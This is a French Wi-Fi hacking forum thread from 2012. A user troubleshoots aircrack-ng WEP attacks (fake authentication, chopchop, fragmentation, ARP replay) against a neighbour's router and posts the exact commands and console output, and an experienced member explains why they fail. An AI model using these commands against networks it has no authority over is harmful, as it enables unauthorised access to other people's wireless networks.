Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 06-08-2012 20:30:52

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Paquets provenant d'autres point d'accès ? Chopchop

Bonjour,

Je fais actuellement des test sur la box de mon voisin/et ami qui est en clef wep.

J'essaie de voir ce que ça donne quand il n'est pas connecté. L'attaque chopchop me chope alors de mauvais paquets (Ok je sors pour l'aussi très mauvais jeu de mots..)
Pas que ça m'embête, mais ça entraine ma curiosité à ce sujet.

Je vise pourtant son point d'accès, comment se fait il que je reçoive des paquets provenant de points d'accès différents ?

Et, autre chose ... Est il possible que son adresse mac soit masquée et que du coup, je compare les résultats que j'obtiens avec une adresse fake ?

(Vraisemblablement, le chopchop n'est pas fructueux. Je vais essayer la fragmentation et vous dire ça. wink )


Edit : Bon, en fragmentation, il ne me propose que dalle. Il ne fait que "read" ses paquets. Pour info, la box est très proche. J'imagine qu'elle est sécurisée contre toute éventuelle attaque chopchop ou fragmentation ...

Dernière modification par Tahos (06-08-2012 20:36:47)


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 06-08-2012 21:06:35

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

C'est toujours mieux lorque tu as un problème de faire un copié/collé de ce qui se passe en console, ordre et résultat, en utilisant la balise code.
Pourquoi dis tu que les paquets capturés proviennent d'un autre AP?
Comment à tu vérifié leur provenance?
On y verra plus clair avec le contenu de tes console (airodump_ng, fausse associaion, chop-chop) wink

Hors Ligne

#3 06-08-2012 21:57:38

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Oui effectivement tu as raison désolé.
En fait, je compare l'adresse mac de BSSID à l'adresse mac de la provenance du paquet que me propose d'utiliser chopchop.

Je te montre depuis le début :

airodump-ng --bssid C0:3F:0E:C6:23:4E -w out --channel 11 mon0

J'obtiens :

 CH 11 ][ Elapsed: 32 s ][ 2012-08-06 22:30                                         
                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                    
                                                                                                                                                       
 C0:3F:0E:C6:23:4E  -66  22      116        0    0  11  54e  WEP  WEP         NUMERICABLE-E64E                                                         
                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                             
                                                                               

Jusque là aucuns soucis !

Puis je fait un coup de --fakeauth :

[email protected]:~# aireplay-ng -1 30 -a C0:3F:0E:C6:23:4E -e NUMERICABLE-E64E -h 00:12:F3:48:AC:3E mon0

Ce qui me donne :

[email protected]:~# aireplay-ng -1 30 -a C0:3F:0E:C6:23:4E -e NUMERICABLE-E64E -h 00:12:F3:48:AC:3E mon0
The interface MAC (00:C0:CA:55:93:40) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether 00:12:F3:48:AC:3E
22:34:09  Waiting for beacon frame (BSSID: C0:3F:0E:C6:23:4E) on channel 11

22:34:09  Sending Authentication Request (Open System) [ACK]
22:34:09  Authentication successful
22:34:09  Sending Association Request [ACK]
22:34:09  Association successful :-) (AID: 1)

Effectivement, je suis bien connecté :

 CH 11 ][ Elapsed: 32 s ][ 2012-08-06 22:30                                         
                                                                                                                                                       
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                    
                                                                                                                                                       
 C0:3F:0E:C6:23:4E  -66  22      116        0    0  11  54e  WEP  WEP         NUMERICABLE-E64E                                                         
                                                                                                                                                       
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
                                                                             
 C0:3F:0E:C6:23:4E  00:12:F3:48:AC:3E    0    1 - 1      0       82    

Je lance chopchop :

aireplay-ng -4 mon0 -a C0:3F:0E:C6:23:4E -h 00:12:F3:48:AC:3E

Mon attaque se passe ...

Et j'obtiens pleins de propositions de ce genre :

[email protected]:~# aireplay-ng -4 mon0 -a C0:3F:0E:C6:23:4E -h 00:12:F3:48:AC:3E
The interface MAC (00:C0:CA:55:93:40) doesn't match the specified MAC (-h).
	ifconfig mon0 hw ether 00:12:F3:48:AC:3E
Read 3378 packets...

        Size: 86, FromDS: 1, ToDS: 0 (WEP)

              BSSID  =  00:24:D4:58:D1:70
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:1C:25:32:CB:5D

        0x0000:  0842 0000 ffff ffff ffff 0024 d458 d170  .B.........$.X.p
        0x0010:  001c 2532 cb5d 9010 c1d3 a900 17a6 0eb7  ..%2.]..........
        0x0020:  2b67 1565 71aa 52de e2bf d2bf 14c1 c7e8  +g.eq.R.........
        0x0030:  b97f 78ab 72a9 f118 081e e2bf 96eb ab13  .x.r...........
        0x0040:  7f99 ec6e bbe0 327b 350e ce2a fc66 a118  ..n..2{5..*.f..
        0x0050:  d8ae b932 3e01                           ...2>.

Use this packet ?

Or, l'adresse mac du paquet ne correspond pas ... (Et si je recommence, il peut arriver que ça soit encore un paquet avec une adresse différente.)


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#4 06-08-2012 23:19:18

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Ca c'est parce que tu n'as aucun datas valable; seulement des beacon, il te faut au moins un data pour pouvoir avoir une chance de succès.
Tu as bien mis le filtre bssid et le filtre canal à ta commande airodump-ng donc tu ne devrais pas capter des paquets d autres réseaux wink

Hors Ligne

#5 06-08-2012 23:27:22

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Donc en gros, c'est bizarre ?

Dernière modification par Tahos (06-08-2012 23:27:41)


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#6 07-08-2012 00:15:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Non, c'est normal si ça ne marche pas car tu n'as aucun paquet valable ( colonne DATA ),
Tu n'as rien pécho pour ton poch - poch tongue
Tu forges un paquets qui n'est pas bon (airodump_ng c'est pour la capture de traffic, aireplay-ng pour l'injection)
Attends d'avoir 1 data pour lancer un chop-chop ou une défragmentation.

Hors Ligne

#7 07-08-2012 09:35:25

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Haha je vois, je vois. Et si j'en pécho jamais sur ce réseau, c'est parce que Numéricable me fait la tête ? hmm

Hum ... Donc il existe bien des réseaux pour lesquels chopchop et fragmentation ne fonctionne pas. C'est bon à savoir ! big_smile


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#8 07-08-2012 10:54:19

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Il y a des routeurs plus bavards que d'autres.
Je veux dire par là que certain tirent des paquets dans l'air sans clients connectés et à bonne cadence et d'autres n'en émettent aucun après plusieurs heures de bataille.
Mais dès que tu as un client qui se connecte c'est une toute autre histoire.
Tu ne parles jamais de la ré-injection d'ARP qui est l'attaque la plus efficace penses-y, parce que avant de tenter un chop-chop / defrag qui sont beaucoup plus aléatoire

Hors Ligne

#9 07-08-2012 11:31:01

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Le problème évidemment de la ré-injection d'ARP c'est qu'il faut que quelqu'un soit connecté à la box non ? (Je me trompe peut être.) Et surtout, il faut qu'airodump ait pu identifié la destination du signal du client.

En somme, il peut arriver que j'ai un nombre impressionnant de signal de "client" "(non associated)". Mais effectivement, j'ai essayé avec la box de mon frère. Quand il est connecté dessus, ça va deux fois plus vite.

Dernière modification par Tahos (07-08-2012 11:31:58)


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#10 07-08-2012 13:46:19

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Tahos a écrit :

Le problème évidemment de la ré-injection d'ARP c'est qu'il faut que quelqu'un soit connecté à la box non ? (Je me trompe peut être.) Et surtout, il faut qu'airodump ait pu identifié la destination du signal du client.
.

Tu peux faire une ré-injection d'ARP avec une fausse association wink
exemple

3.png

Hors Ligne

#11 07-08-2012 13:56:37

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Ok ! Je ne savais pas !

Je vais essayer ça ce soir voir si Numéricable reste silencieux. smile


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#12 08-08-2012 20:42:59

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

J'ai donc bien essayé :

lol

La fake auth marche très bien (En même temps le signal est excellent.) :

paquets

La ré-injection envoie bien des paquets. Mais la box ne sort pas UN SEUL ARP. Elle reste silencieuse :

cap1

(Après plus de 150 000 paquets, 0 data.)
Comme quoi, y'a des WEP tenaces. smile Mon voisin est un peu rassuré, je lui ai mis un coup de flip quand je lui ai montré comment la box de mon frère en WEP (Maintenant en WPA) était facilement crackable.


Edit : J'en profite pour dire que je viens d'essayer l'injection quand il était connecté à sa box. (En me faisant donc passé pour lui.) : Les box numéricables se mettent à parler wink A mon avis, il doit y avoir un filtrage mac ou quelque chose comme ça.

Dernière modification par Tahos (08-08-2012 21:26:00)


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#13 09-08-2012 07:33:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Si il y avait un filtrage mac tu ne pourrais pas faire la fausse association sans changer ta mac avec la mac d'un client légitime.
Je vois que tu fais les tests en étant connecté ce qu'il ne faut pas faire ( processus conflictuels, injection limitée au canal du réseau auquel on est connecté )
Si la box est bavarde lorsqu'il y a un client connecté; c'est normal vu qu'il y a du traffic. wink
Et c'est bien là le "drame", tu peux sophistiquer avec filtrage mac, cacher le bssid; avoir un routeur blindé, résistant à la fausse association et absolument muet lorsqu'il n'y a pas de traffic; n'importe qui récupèrera ta clef WEP avec airdoump-ng et un simple scan dès lors que tu te connecteras...
Donc ton voisin ne devrait vraiment pas penser qu'il est protégé

Hors Ligne

#14 09-08-2012 09:13:12

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

Ouaip, pas faux pour la fake auth ... C'est donc seulement une box pas bavarde.

Je suis connecté à ma box en même temps, mais sur Mac OS : Ça réduit donc mes performances en terme d'injection ? Merci ! Je note, je le faisais à chaque fois.

Mine de rien, incroyable cet outil qu'est airodump.

Pour mon voisin, je l'ai convaincu à passer à la WPA, ne t'inquiète pas wink


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

#15 09-08-2012 12:39:40

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Paquets provenant d'autres point d'accès ? Chopchop

Je n'avais pas vu la pomme... tongue
Si tu es connecté avec airport je ne crois pas, si c'est avec l'alfa je pense que tu ferais mieux de ne pas te connecter.

Hors Ligne

#16 09-08-2012 14:22:56

Tahos
Membre Actif
Inscription : 08-07-2012
Messages : 27

Re : Paquets provenant d'autres point d'accès ? Chopchop

J'étais connecté avec airport. smile
L'awus 036H ne marche sous Mac OS 1.7 qu'en 32 bits. (Et comme je boot pas souvent en 32 bits ...)

En tout cas merci pour ton aide ! smile


Vous savez, moi je ne crois pas qu'il y ait de bonnes ou de mauvaises situations ...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.044 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]